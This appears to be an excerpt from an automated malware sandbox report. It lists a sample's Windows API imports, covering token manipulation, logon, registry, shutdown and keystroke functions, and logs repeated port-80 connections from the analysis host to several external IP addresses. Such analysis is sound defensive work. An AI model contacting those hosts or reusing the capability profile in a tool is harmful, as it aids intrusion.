OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                      GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                      COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                      ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                      SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                      ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                      OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

                      Possible Origin

                      Language of compilation systemCountry where language is spokenMap
                      EnglishGreat Britain

                      Network Behavior

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Aug 23, 2024 08:25:53.353598118 CEST4971880192.168.2.6194.233.65.154
                      Aug 23, 2024 08:25:53.364357948 CEST8049718194.233.65.154192.168.2.6
                      Aug 23, 2024 08:25:53.364450932 CEST4971880192.168.2.6194.233.65.154
                      Aug 23, 2024 08:25:53.372277021 CEST4971880192.168.2.6194.233.65.154
                      Aug 23, 2024 08:25:53.377161026 CEST8049718194.233.65.154192.168.2.6
                      Aug 23, 2024 08:25:54.333453894 CEST8049718194.233.65.154192.168.2.6
                      Aug 23, 2024 08:25:54.333472967 CEST8049718194.233.65.154192.168.2.6
                      Aug 23, 2024 08:25:54.333483934 CEST8049718194.233.65.154192.168.2.6
                      Aug 23, 2024 08:25:54.333496094 CEST8049718194.233.65.154192.168.2.6
                      Aug 23, 2024 08:25:54.333595037 CEST8049718194.233.65.154192.168.2.6
                      Aug 23, 2024 08:25:54.333606005 CEST8049718194.233.65.154192.168.2.6
                      Aug 23, 2024 08:25:54.333616972 CEST8049718194.233.65.154192.168.2.6
                      Aug 23, 2024 08:25:54.333628893 CEST8049718194.233.65.154192.168.2.6
                      Aug 23, 2024 08:25:54.333729982 CEST8049718194.233.65.154192.168.2.6
                      Aug 23, 2024 08:25:54.333740950 CEST8049718194.233.65.154192.168.2.6
                      Aug 23, 2024 08:25:54.333858013 CEST4971880192.168.2.6194.233.65.154
                      Aug 23, 2024 08:25:54.333858013 CEST4971880192.168.2.6194.233.65.154
                      Aug 23, 2024 08:25:54.334057093 CEST8049718194.233.65.154192.168.2.6
                      Aug 23, 2024 08:25:54.334109068 CEST4971880192.168.2.6194.233.65.154
                      Aug 23, 2024 08:25:54.339076042 CEST4971880192.168.2.6194.233.65.154
                      Aug 23, 2024 08:25:54.344973087 CEST8049718194.233.65.154192.168.2.6
                      Aug 23, 2024 08:26:09.414088964 CEST4972180192.168.2.645.157.69.194
                      Aug 23, 2024 08:26:09.418952942 CEST804972145.157.69.194192.168.2.6
                      Aug 23, 2024 08:26:09.419068098 CEST4972180192.168.2.645.157.69.194
                      Aug 23, 2024 08:26:09.429574966 CEST4972180192.168.2.645.157.69.194
                      Aug 23, 2024 08:26:09.435416937 CEST804972145.157.69.194192.168.2.6
                      Aug 23, 2024 08:26:10.267561913 CEST804972145.157.69.194192.168.2.6
                      Aug 23, 2024 08:26:10.267729044 CEST804972145.157.69.194192.168.2.6
                      Aug 23, 2024 08:26:10.267786980 CEST4972180192.168.2.645.157.69.194
                      Aug 23, 2024 08:26:10.945601940 CEST4972180192.168.2.645.157.69.194
                      Aug 23, 2024 08:26:11.964207888 CEST4972280192.168.2.645.157.69.194
                      Aug 23, 2024 08:26:11.969249010 CEST804972245.157.69.194192.168.2.6
                      Aug 23, 2024 08:26:11.969332933 CEST4972280192.168.2.645.157.69.194
                      Aug 23, 2024 08:26:11.979708910 CEST4972280192.168.2.645.157.69.194
                      Aug 23, 2024 08:26:11.984510899 CEST804972245.157.69.194192.168.2.6
                      Aug 23, 2024 08:26:12.814779997 CEST804972245.157.69.194192.168.2.6
                      Aug 23, 2024 08:26:12.814852953 CEST804972245.157.69.194192.168.2.6
                      Aug 23, 2024 08:26:12.815012932 CEST4972280192.168.2.645.157.69.194
                      Aug 23, 2024 08:26:13.492579937 CEST4972280192.168.2.645.157.69.194
                      Aug 23, 2024 08:26:14.510972977 CEST4972380192.168.2.645.157.69.194
                      Aug 23, 2024 08:26:14.515769005 CEST804972345.157.69.194192.168.2.6
                      Aug 23, 2024 08:26:14.515867949 CEST4972380192.168.2.645.157.69.194
                      Aug 23, 2024 08:26:14.526680946 CEST4972380192.168.2.645.157.69.194
                      Aug 23, 2024 08:26:14.532207012 CEST804972345.157.69.194192.168.2.6
                      Aug 23, 2024 08:26:14.532717943 CEST804972345.157.69.194192.168.2.6
                      Aug 23, 2024 08:26:15.381623983 CEST804972345.157.69.194192.168.2.6
                      Aug 23, 2024 08:26:15.381776094 CEST804972345.157.69.194192.168.2.6
                      Aug 23, 2024 08:26:15.381864071 CEST4972380192.168.2.645.157.69.194
                      Aug 23, 2024 08:26:16.039256096 CEST4972380192.168.2.645.157.69.194
                      Aug 23, 2024 08:26:17.065077066 CEST4972480192.168.2.645.157.69.194
                      Aug 23, 2024 08:26:17.070036888 CEST804972445.157.69.194192.168.2.6
                      Aug 23, 2024 08:26:17.070126057 CEST4972480192.168.2.645.157.69.194
                      Aug 23, 2024 08:26:17.077794075 CEST4972480192.168.2.645.157.69.194
                      Aug 23, 2024 08:26:17.082638025 CEST804972445.157.69.194192.168.2.6
                      Aug 23, 2024 08:26:17.917974949 CEST804972445.157.69.194192.168.2.6
                      Aug 23, 2024 08:26:17.918004036 CEST804972445.157.69.194192.168.2.6
                      Aug 23, 2024 08:26:17.918268919 CEST4972480192.168.2.645.157.69.194
                      Aug 23, 2024 08:26:17.921031952 CEST4972480192.168.2.645.157.69.194
                      Aug 23, 2024 08:26:17.925926924 CEST804972445.157.69.194192.168.2.6
                      Aug 23, 2024 08:26:22.993303061 CEST4972580192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:22.998210907 CEST804972537.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:22.998322010 CEST4972580192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:23.010622978 CEST4972580192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:23.015499115 CEST804972537.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:23.852689028 CEST804972537.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:23.852710009 CEST804972537.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:23.852720976 CEST804972537.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:23.852730989 CEST804972537.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:23.852742910 CEST804972537.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:23.852752924 CEST804972537.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:23.852765083 CEST804972537.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:23.852777004 CEST804972537.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:23.852787971 CEST804972537.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:23.852798939 CEST804972537.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:23.852827072 CEST4972580192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:23.852901936 CEST4972580192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:23.861167908 CEST804972537.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:23.914170027 CEST4972580192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:23.939506054 CEST804972537.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:23.939527988 CEST804972537.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:23.939538956 CEST804972537.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:23.939551115 CEST804972537.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:23.939563036 CEST804972537.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:23.939642906 CEST4972580192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:23.940118074 CEST804972537.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:23.940134048 CEST804972537.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:23.940145016 CEST804972537.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:23.940155029 CEST804972537.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:23.940167904 CEST804972537.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:23.940176964 CEST4972580192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:23.940201044 CEST4972580192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:23.940253019 CEST4972580192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:23.940593004 CEST804972537.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:23.940665007 CEST804972537.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:23.940679073 CEST804972537.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:23.940695047 CEST804972537.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:23.940705061 CEST804972537.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:23.940712929 CEST4972580192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:23.940743923 CEST4972580192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:23.941360950 CEST804972537.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:23.941417933 CEST4972580192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:24.523714066 CEST4972580192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:25.542562008 CEST4972680192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:25.547753096 CEST804972637.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:25.547943115 CEST4972680192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:25.558609962 CEST4972680192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:25.567114115 CEST804972637.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:26.440879107 CEST804972637.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:26.440943956 CEST804972637.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:26.440954924 CEST804972637.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:26.440965891 CEST804972637.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:26.440974951 CEST804972637.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:26.440985918 CEST804972637.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:26.440999031 CEST804972637.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:26.441009998 CEST804972637.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:26.441020012 CEST804972637.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:26.441039085 CEST804972637.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:26.441072941 CEST4972680192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:26.441092968 CEST4972680192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:26.445990086 CEST804972637.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:26.446063042 CEST804972637.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:26.446134090 CEST4972680192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:26.533468008 CEST804972637.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:26.533503056 CEST804972637.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:26.533514977 CEST804972637.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:26.533565044 CEST4972680192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:26.533665895 CEST804972637.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:26.533679008 CEST804972637.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:26.533713102 CEST4972680192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:26.533778906 CEST804972637.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:26.533818007 CEST4972680192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:26.533833027 CEST804972637.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:26.533850908 CEST804972637.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:26.533865929 CEST804972637.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:26.533878088 CEST804972637.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:26.533889055 CEST4972680192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:26.533936977 CEST4972680192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:26.534751892 CEST804972637.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:26.534761906 CEST804972637.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:26.534773111 CEST804972637.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:26.534806013 CEST4972680192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:26.534821987 CEST804972637.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:26.534885883 CEST4972680192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:27.070575953 CEST4972680192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:28.095729113 CEST4972780192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:28.100734949 CEST804972737.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:28.100944042 CEST4972780192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:28.111567020 CEST4972780192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:28.117292881 CEST804972737.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:28.118549109 CEST804972737.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:28.965934038 CEST804972737.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:28.965971947 CEST804972737.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:28.965982914 CEST804972737.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:28.965993881 CEST804972737.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:28.966002941 CEST804972737.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:28.966013908 CEST804972737.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:28.966023922 CEST804972737.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:28.966036081 CEST804972737.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:28.966046095 CEST804972737.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:28.966046095 CEST4972780192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:28.966057062 CEST804972737.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:28.966294050 CEST4972780192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:28.966294050 CEST4972780192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:28.970944881 CEST804972737.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:28.970964909 CEST804972737.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:28.970974922 CEST804972737.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:28.971019030 CEST4972780192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:29.052767992 CEST804972737.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:29.052783966 CEST804972737.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:29.052793980 CEST804972737.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:29.052809954 CEST804972737.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:29.052822113 CEST804972737.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:29.052988052 CEST4972780192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:29.052989006 CEST4972780192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:29.053169966 CEST804972737.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:29.053180933 CEST804972737.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:29.053191900 CEST804972737.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:29.053215981 CEST4972780192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:29.053235054 CEST4972780192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:29.053255081 CEST804972737.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:29.053263903 CEST804972737.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:29.053296089 CEST4972780192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:29.054102898 CEST804972737.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:29.054112911 CEST804972737.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:29.054124117 CEST804972737.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:29.054152012 CEST804972737.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:29.054184914 CEST4972780192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:29.054220915 CEST4972780192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:29.617549896 CEST4972780192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:30.636315107 CEST4972880192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:30.641355038 CEST804972837.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:30.641448975 CEST4972880192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:30.648657084 CEST4972880192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:30.653486013 CEST804972837.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:31.507069111 CEST804972837.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:31.507110119 CEST804972837.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:31.507122040 CEST804972837.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:31.507179976 CEST4972880192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:31.507230997 CEST804972837.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:31.507250071 CEST804972837.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:31.507261038 CEST804972837.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:31.507333040 CEST4972880192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:31.507383108 CEST804972837.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:31.507390022 CEST4972880192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:31.507397890 CEST804972837.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:31.507410049 CEST804972837.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:31.507422924 CEST804972837.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:31.507436037 CEST4972880192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:31.507464886 CEST4972880192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:31.512497902 CEST804972837.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:31.512615919 CEST804972837.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:31.512707949 CEST4972880192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:31.593806028 CEST804972837.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:31.593836069 CEST804972837.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:31.593847036 CEST804972837.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:31.593861103 CEST804972837.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:31.593905926 CEST804972837.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:31.593919039 CEST804972837.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:31.593930960 CEST804972837.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:31.594001055 CEST4972880192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:31.594039917 CEST4972880192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:31.594779015 CEST804972837.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:31.594799042 CEST804972837.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:31.594810963 CEST804972837.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:31.594824076 CEST804972837.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:31.594846964 CEST4972880192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:31.594937086 CEST4972880192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:31.595328093 CEST804972837.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:31.595349073 CEST804972837.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:31.595362902 CEST804972837.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:31.595396042 CEST4972880192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:31.595421076 CEST804972837.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:31.595433950 CEST804972837.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:31.595479012 CEST4972880192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:31.595563889 CEST4972880192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:31.596132040 CEST804972837.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:31.596237898 CEST4972880192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:31.604964018 CEST4972880192.168.2.637.187.158.211
                      Aug 23, 2024 08:26:31.609883070 CEST804972837.187.158.211192.168.2.6
                      Aug 23, 2024 08:26:36.635682106 CEST4972980192.168.2.6167.172.133.32
                      Aug 23, 2024 08:26:36.641515970 CEST8049729167.172.133.32192.168.2.6
                      Aug 23, 2024 08:26:36.641612053 CEST4972980192.168.2.6167.172.133.32
                      Aug 23, 2024 08:26:36.650914907 CEST4972980192.168.2.6167.172.133.32
                      Aug 23, 2024 08:26:36.655730009 CEST8049729167.172.133.32192.168.2.6
                      Aug 23, 2024 08:26:37.117222071 CEST8049729167.172.133.32192.168.2.6
                      Aug 23, 2024 08:26:37.117460966 CEST8049729167.172.133.32192.168.2.6
                      Aug 23, 2024 08:26:37.117667913 CEST4972980192.168.2.6167.172.133.32
                      Aug 23, 2024 08:26:38.164341927 CEST4972980192.168.2.6167.172.133.32
                      Aug 23, 2024 08:26:39.183159113 CEST4973180192.168.2.6167.172.133.32
                      Aug 23, 2024 08:26:39.188404083 CEST8049731167.172.133.32192.168.2.6
                      Aug 23, 2024 08:26:39.188510895 CEST4973180192.168.2.6167.172.133.32
                      Aug 23, 2024 08:26:39.200001001 CEST4973180192.168.2.6167.172.133.32
                      Aug 23, 2024 08:26:39.204998970 CEST8049731167.172.133.32192.168.2.6
                      Aug 23, 2024 08:26:39.647275925 CEST8049731167.172.133.32192.168.2.6
                      Aug 23, 2024 08:26:39.647360086 CEST8049731167.172.133.32192.168.2.6
                      Aug 23, 2024 08:26:39.647609949 CEST4973180192.168.2.6167.172.133.32
                      Aug 23, 2024 08:26:40.711133957 CEST4973180192.168.2.6167.172.133.32
                      Aug 23, 2024 08:26:41.729693890 CEST4973280192.168.2.6167.172.133.32
                      Aug 23, 2024 08:26:41.735296965 CEST8049732167.172.133.32192.168.2.6
                      Aug 23, 2024 08:26:41.735400915 CEST4973280192.168.2.6167.172.133.32
                      Aug 23, 2024 08:26:41.745754004 CEST4973280192.168.2.6167.172.133.32
                      Aug 23, 2024 08:26:41.750674009 CEST8049732167.172.133.32192.168.2.6
                      Aug 23, 2024 08:26:41.750761032 CEST8049732167.172.133.32192.168.2.6
                      Aug 23, 2024 08:26:42.181055069 CEST8049732167.172.133.32192.168.2.6
                      Aug 23, 2024 08:26:42.181071997 CEST8049732167.172.133.32192.168.2.6
                      Aug 23, 2024 08:26:42.181135893 CEST4973280192.168.2.6167.172.133.32
                      Aug 23, 2024 08:26:43.258017063 CEST4973280192.168.2.6167.172.133.32
                      Aug 23, 2024 08:26:44.276144028 CEST4973380192.168.2.6167.172.133.32
                      Aug 23, 2024 08:26:44.281039953 CEST8049733167.172.133.32192.168.2.6
                      Aug 23, 2024 08:26:44.281146049 CEST4973380192.168.2.6167.172.133.32
                      Aug 23, 2024 08:26:44.287750959 CEST4973380192.168.2.6167.172.133.32
                      Aug 23, 2024 08:26:44.293030977 CEST8049733167.172.133.32192.168.2.6
                      Aug 23, 2024 08:26:44.745959997 CEST8049733167.172.133.32192.168.2.6
                      Aug 23, 2024 08:26:44.745979071 CEST8049733167.172.133.32192.168.2.6
                      Aug 23, 2024 08:26:44.746148109 CEST4973380192.168.2.6167.172.133.32
                      Aug 23, 2024 08:26:44.748749018 CEST4973380192.168.2.6167.172.133.32
                      Aug 23, 2024 08:26:44.754209042 CEST8049733167.172.133.32192.168.2.6
                      Aug 23, 2024 08:26:50.202029943 CEST4973480192.168.2.6206.119.82.116
                      Aug 23, 2024 08:26:50.206871986 CEST8049734206.119.82.116192.168.2.6
                      Aug 23, 2024 08:26:50.207031965 CEST4973480192.168.2.6206.119.82.116
                      Aug 23, 2024 08:26:50.219079971 CEST4973480192.168.2.6206.119.82.116
                      Aug 23, 2024 08:26:50.223912954 CEST8049734206.119.82.116192.168.2.6
                      Aug 23, 2024 08:26:51.116121054 CEST8049734206.119.82.116192.168.2.6
                      Aug 23, 2024 08:26:51.116139889 CEST8049734206.119.82.116192.168.2.6
                      Aug 23, 2024 08:26:51.116213083 CEST4973480192.168.2.6206.119.82.116
                      Aug 23, 2024 08:26:51.726737022 CEST4973480192.168.2.6206.119.82.116
                      Aug 23, 2024 08:26:52.746952057 CEST4973580192.168.2.6206.119.82.116
                      Aug 23, 2024 08:26:52.751821041 CEST8049735206.119.82.116192.168.2.6
                      Aug 23, 2024 08:26:52.751997948 CEST4973580192.168.2.6206.119.82.116
                      Aug 23, 2024 08:26:52.762989044 CEST4973580192.168.2.6206.119.82.116
                      Aug 23, 2024 08:26:52.767806053 CEST8049735206.119.82.116192.168.2.6
                      Aug 23, 2024 08:26:53.682740927 CEST8049735206.119.82.116192.168.2.6
                      Aug 23, 2024 08:26:53.682771921 CEST8049735206.119.82.116192.168.2.6
                      Aug 23, 2024 08:26:53.682831049 CEST4973580192.168.2.6206.119.82.116
                      Aug 23, 2024 08:26:54.274947882 CEST4973580192.168.2.6206.119.82.116
                      Aug 23, 2024 08:26:55.293167114 CEST4973680192.168.2.6206.119.82.116
                      Aug 23, 2024 08:26:55.298244953 CEST8049736206.119.82.116192.168.2.6
                      Aug 23, 2024 08:26:55.298317909 CEST4973680192.168.2.6206.119.82.116
                      Aug 23, 2024 08:26:55.311536074 CEST4973680192.168.2.6206.119.82.116
                      Aug 23, 2024 08:26:55.316473961 CEST8049736206.119.82.116192.168.2.6
                      Aug 23, 2024 08:26:55.316530943 CEST8049736206.119.82.116192.168.2.6
                      Aug 23, 2024 08:26:56.196719885 CEST8049736206.119.82.116192.168.2.6
                      Aug 23, 2024 08:26:56.196798086 CEST8049736206.119.82.116192.168.2.6
                      Aug 23, 2024 08:26:56.196937084 CEST4973680192.168.2.6206.119.82.116
                      Aug 23, 2024 08:26:56.821063995 CEST4973680192.168.2.6206.119.82.116
                      Aug 23, 2024 08:26:57.840023041 CEST4973780192.168.2.6206.119.82.116
                      Aug 23, 2024 08:26:57.844852924 CEST8049737206.119.82.116192.168.2.6
                      Aug 23, 2024 08:26:57.844924927 CEST4973780192.168.2.6206.119.82.116
                      Aug 23, 2024 08:26:57.854135990 CEST4973780192.168.2.6206.119.82.116
                      Aug 23, 2024 08:26:57.858890057 CEST8049737206.119.82.116192.168.2.6
                      Aug 23, 2024 08:26:58.733803034 CEST8049737206.119.82.116192.168.2.6
                      Aug 23, 2024 08:26:58.733916998 CEST8049737206.119.82.116192.168.2.6
                      Aug 23, 2024 08:26:58.734010935 CEST4973780192.168.2.6206.119.82.116
                      Aug 23, 2024 08:26:58.736812115 CEST4973780192.168.2.6206.119.82.116
                      Aug 23, 2024 08:26:58.743391991 CEST8049737206.119.82.116192.168.2.6
